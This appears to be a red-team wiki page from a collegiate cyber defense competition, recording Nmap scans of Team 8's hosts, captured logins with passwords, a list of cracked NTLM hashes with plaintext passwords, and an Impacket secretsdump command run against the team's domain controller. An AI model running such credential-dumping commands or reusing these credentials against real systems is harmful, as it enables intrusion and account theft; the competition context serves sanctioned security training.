Team 8 Wiki Page

Team Information
Number: Team 8
Name: MagikARP
IP Range: 104.190.101.0/24
Domain: team8.isucdc.com
Current Place: 5th
Red Teamer(s): None
Service Status
AD LDAP
AD RDP
JD RDP
LTV SSH
NEWS SSH
NEWS HTTP
WSTN SSH
WSTN MQTT
WWW SSH
WWW HTTP
Nmap
# Nmap 7.93 scan initiated Sat Dec  6 08:24:54 2025
Nmap scan report for ad.team8.isucdc.com (104.190.101.10)
Host is up (0.019s latency).
rDNS record for 104.190.101.10: 104-190-101-10.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   3072 23db0d4fedfbe651ecfb8af8537de343 (RSA)
|   384 1e15a74d7e619d1b725ffb9bc1e1af9b (ECDSA)
|_  256 4fed0bb743e669f8a0e80dd2ae18b5ae (ED25519)
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-12-06 14:31:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: team8.isucdc.com0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: team8.isucdc.com0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ad.team8.isucdc.com
| Not valid before: 2025-11-06T19:05:30
|_Not valid after:  2026-05-08T19:05:30
|_ssl-date: 2025-12-06T14:33:43+00:00; -30s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: TEAM8
|   NetBIOS_Domain_Name: TEAM8
|   NetBIOS_Computer_Name: AD
|   DNS_Domain_Name: team8.isucdc.com
|   DNS_Computer_Name: ad.team8.isucdc.com
|   DNS_Tree_Name: team8.isucdc.com
|   Product_Version: 10.0.17763
|_  System_Time: 2025-12-06T14:33:03+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49753/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -30s, deviation: 0s, median: -30s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-12-06T14:33:06
|_  start_date: N/A

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   6.00 ms 104-190-101-10.lightspeed.sgnwmi.sbcglobal.net (104.190.101.10)

Nmap scan report for jd.team8.isucdc.com (104.190.101.20)
Host is up (0.014s latency).
rDNS record for 104.190.101.20: 104-190-101-20.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65528 filtered tcp ports (no-response)
PORT      STATE SERVICE            VERSION
22/tcp    open  ssh                OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp   open  msrpc              Microsoft Windows RPC
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=jd.team8.isucdc.com
| Not valid before: 2025-11-06T20:51:09
|_Not valid after:  2026-05-08T20:51:09
|_ssl-date: TLS randomness does not represent time
| rdp-ntlm-info: 
|   Target_Name: TEAM8
|   NetBIOS_Domain_Name: TEAM8
|   NetBIOS_Computer_Name: JD
|   DNS_Domain_Name: team8.isucdc.com
|   DNS_Computer_Name: jd.team8.isucdc.com
|   DNS_Tree_Name: team8.isucdc.com
|   Product_Version: 10.0.22621
|_  System_Time: 2025-12-06T14:33:03+00:00
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc              Microsoft Windows RPC
49673/tcp open  msrpc              Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -31s

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   5.00 ms 104-190-101-20.lightspeed.sgnwmi.sbcglobal.net (104.190.101.20)

Nmap scan report for ltv.team8.isucdc.com (104.190.101.30)
Host is up (0.015s latency).
rDNS record for 104.190.101.30: 104-190-101-30.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 0c7c02eb5a9fe29566c11e06cf84cf47 (DSA)
|   2048 453739b58fc6b978ab1e41dd81596ecf (RSA)
|   256 89e9f14ac8d9391f078dd4603c19c4dd (ECDSA)
|_  256 58de7185954051643b9ee99cebfdf838 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): Linux 3.X|4.X (85%), Linksys embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel cpe:/h:linksys:ea3500 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
Aggressive OS guesses: Linksys EA3500 WAP (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
1   5.00 ms 12.110.254.254
2   7.00 ms 104-190-101-30.lightspeed.sgnwmi.sbcglobal.net (104.190.101.30)

Nmap scan report for news.team8.isucdc.com (104.190.101.40)
Host is up (0.016s latency).
rDNS record for 104.190.101.40: 104-190-101-40.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 357994a98dd506f35bb6c7317962de08 (RSA)
|   256 95a6a90f800410e48ba00b686b3907e8 (ECDSA)
|_  256 9578e1eedc0ef62ba30dddaae08fa7cd (ED25519)
123/tcp  closed ntp
389/tcp  closed ldap
8080/tcp open   http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Disposition: inline;filename=f.txt
|     Content-Type: application/json
|     Date: Sat, 06 Dec 2025 19:03:03 GMT
|     Connection: close
|     {"timestamp":"2025-12-06T14:31:31.985+00:00","status":404,"error":"Not Found","message":"","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 06 Dec 2025 19:03:03 GMT
|     Connection: close
|     {"timestamp":"2025-12-06T14:31:31.796+00:00","status":404,"error":"Not Found","message":"","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 06 Dec 2025 19:03:03 GMT
|     Connection: close
|     {"timestamp":"2025-12-06T14:31:31.813+00:00","status":404,"error":"Not Found","message":"","path":"/"}
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 06 Dec 2025 19:03:03 GMT
|     Connection: close
|     HTTP Status 400 
|     Request body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}
|     HTTP Status 400 
|_    Request
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Device type: general purpose|proxy server
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X (87%), WebSense embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel
Aggressive OS guesses: Linux 4.15 - 5.6 (87%), Linux 5.3 - 5.4 (85%), Linux 2.6.32 (85%), Websense Content Gateway (85%), Linux 5.0 - 5.3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 123/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   6.00 ms 104-190-101-40.lightspeed.sgnwmi.sbcglobal.net (104.190.101.40)

Nmap scan report for wstn.team8.isucdc.com (104.190.101.50)
Host is up (0.0069s latency).
rDNS record for 104.190.101.50: 104-190-101-50.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE  SERVICE                  VERSION
22/tcp   open   ssh                      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 5a185df5ed7864cc5387404bb610863a (RSA)
|   256 e474126041a3534067eeeadac542e3fd (ECDSA)
|_  256 0799db383afe5abafc5c27c9ea83c3c5 (ED25519)
80/tcp   closed http
443/tcp  closed https
1337/tcp open   waste?
1883/tcp open   mosquitto version 2.0.11
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/clients/active: 3
|     $SYS/broker/publish/bytes/sent: 70272
|     $SYS/broker/load/connections/5min: 0.32
|     $SYS/broker/load/bytes/sent/5min: 989.19
|     $SYS/broker/load/messages/received/5min: 14.63
|     $SYS/broker/messages/stored: 38
|     $SYS/broker/load/messages/sent/15min: 16.72
|     $SYS/broker/load/bytes/received/15min: 679.90
|     $SYS/broker/publish/messages/received: 2117
|     $SYS/broker/load/publish/received/1min: 12.18
|     $SYS/broker/load/publish/received/15min: 11.99
|     $SYS/broker/messages/sent: 2747
|     TEAM_8/weather_data: \x80\x04\x95\x16\x00\x00\x00\x00\x00\x00\x00C\x12\x08af,UJ!>i_O\x04B@\x19S>Z\x94.
|     $SYS/broker/version: mosquitto version 2.0.11
|     $SYS/broker/heap/maximum: 47712
|     $SYS/broker/load/sockets/15min: 0.35
|     $SYS/broker/uptime: 22731 seconds
|     $SYS/broker/load/sockets/5min: 0.60
|     $SYS/broker/subscriptions/count: 3
|     $SYS/broker/store/messages/bytes: 204
|     $SYS/broker/store/messages/count: 38
|     $SYS/broker/retained messages/count: 42
|     $SYS/broker/publish/messages/sent: 2189
|     $SYS/broker/load/messages/sent/1min: 51.38
|     $SYS/broker/clients/connected: 3
|     $SYS/broker/load/messages/received/15min: 14.21
|     $SYS/broker/load/bytes/received/5min: 689.65
|     $SYS/broker/load/messages/sent/5min: 22.10
|     $SYS/broker/bytes/sent: 122760
|     $SYS/broker/heap/current: 47208
|     $SYS/broker/messages/received: 2677
|     $SYS/broker/load/publish/sent/15min: 14.51
|     $SYS/broker/load/sockets/1min: 1.62
|     $SYS/broker/load/publish/received/5min: 12.02
|     $SYS/broker/clients/total: 3
|     $SYS/broker/load/publish/sent/5min: 19.48
|     $SYS/broker/load/connections/1min: 1.00
|     $SYS/broker/load/bytes/sent/1min: 2135.52
|     $SYS/broker/load/connections/15min: 0.12
|     $SYS/broker/load/messages/received/1min: 16.66
|     $SYS/broker/load/bytes/sent/15min: 780.75
|     $SYS/broker/clients/maximum: 3
|     $SYS/broker/load/bytes/received/1min: 735.10
|     $SYS/broker/load/publish/sent/1min: 46.90
|     $SYS/broker/publish/bytes/received: 69861
|_    $SYS/broker/bytes/received: 119783
8080/tcp closed http-proxy
Device type: general purpose|proxy server
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X (87%), WebSense embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel
Aggressive OS guesses: Linux 4.15 - 5.6 (87%), Linux 5.3 - 5.4 (86%), Linux 2.6.32 (86%), Linux 5.0 - 5.3 (86%), Websense Content Gateway (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   13.00 ms 104-190-101-50.lightspeed.sgnwmi.sbcglobal.net (104.190.101.50)

Nmap scan report for www.team8.isucdc.com (104.190.101.60)
Host is up (0.0065s latency).
rDNS record for 104.190.101.60: 104-190-101-60.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE  SERVICE                  VERSION
22/tcp   open   ssh                      OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey: 
|   256 a06a89c7a4b137232d3aa124c3761006 (ECDSA)
|_  256 a87c353ddf2b92072b1ec85a8dd37e0f (ED25519)
80/tcp   open   http                     Apache httpd 2.4.65 ((Debian))
|_http-title: Arrow pointing to the left
|_http-server-header: Apache/2.4.65 (Debian)
443/tcp  closed https
445/tcp  closed microsoft-ds
1883/tcp open   mosquitto version 2.0.11
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/load/sockets/1min: 0.08
|     $SYS/broker/load/connections/1min: 0.08
|     $SYS/broker/load/bytes/sent/1min: 0.34
|     $SYS/broker/load/messages/received/1min: 0.08
|     $SYS/broker/load/messages/sent/1min: 0.08
|     $SYS/broker/version: mosquitto version 2.0.11
|     $SYS/broker/uptime: 2475586 seconds
|     $SYS/broker/load/bytes/received/1min: 1.52
|     $SYS/broker/load/bytes/sent/5min: 0.49
|     $SYS/broker/load/bytes/received/15min: 1.02
|_    $SYS/broker/load/bytes/received/5min: 2.19
8080/tcp closed http-proxy
Device type: general purpose|proxy server
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X (87%), WebSense embedded (86%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel
Aggressive OS guesses: Linux 4.15 - 5.6 (87%), Linux 5.3 - 5.4 (86%), Linux 2.6.32 (86%), Websense Content Gateway (86%), Linux 5.0 - 5.3 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   12.00 ms 104-190-101-60.lightspeed.sgnwmi.sbcglobal.net (104.190.101.60)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  6 08:40:48 2025 -- 6 IP addresses (6 hosts up) scanned in 954.59 seconds

Notable Vulnerabilities
2025-12-06_09:05:06  nicole.galvan, dom787zov, From: 49.10.235.154
2025-12-06_09:10:06  nicole.galvan, dom787zov, From: 49.10.235.154
2025-12-06_09:15:07  alison.taylor, gag713cek, From: 49.10.235.154


Cracked NTLM
Administrator -> EMPTY PASSWORD
david.ward -> e49e5d3b4bed0ac0e8817e2541438cd7->met839buc
matthew.hansen -> 7e9b6b9f95fb64e4541c967d9e35b16c->ruz301rey
df5467758e1973b20f6028913ee9395c->mit617cus
99b52187778615e37b4c9e018f03a10d->yuq469sab
0eb573a9a6a9457dad02c93133ee4870->gag713cek
25a89ae327a61e6b8a51ef70ec3c4170->dom787zov
54dba722cd1f13561f583ca4a6ae88a6->bas122kod
2a9e645994252b382941d93d30bd1df3->bish0p
f9d5bbf2a7f6944dee88b52ce42b9117->vanoye10
44a9393a09b841a2ead5b77284968a73->dimple18
46cad2bbbe63b0c4c53839b938a50f79->Abby21
team8.isucdc.com\guthix -> bc8a032e54236604dd2d2fe4ea64fd23->jackson1231231


./secretsdump.py 'AD$'@ad.team8.isucdc.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] ClearText passwords grabbed
[*] Cleaning up...





Notable Defenses
Team Spirit Issues
David Ward doesn't have admin privileges on JD; the red team flag would have been planted if permissions had been set properly.